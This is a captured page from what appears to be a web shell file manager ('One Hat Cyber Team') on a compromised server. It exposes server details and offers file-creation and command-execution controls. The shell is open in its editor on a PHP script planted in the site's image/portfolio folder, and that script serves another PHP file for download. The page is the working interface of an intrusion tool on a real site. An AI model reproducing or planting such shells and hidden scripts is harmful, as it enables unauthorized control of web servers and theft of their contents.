⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.164
Server IP:
103.103.21.11
Server:
Linux lcindo.co.id 5.15.0-171-generic #181-Ubuntu SMP Fri Feb 6 22:44:50 UTC 2026 x86_64
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
www
/
wwwroot
/
lcindo.co.id
/
assets
/
front
/
img
/
portfolio
/
Edit File: 2.php
<?php $file = '590811.php'; if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); readfile($file); exit; } else { echo "File not found."; } ?>
Simpan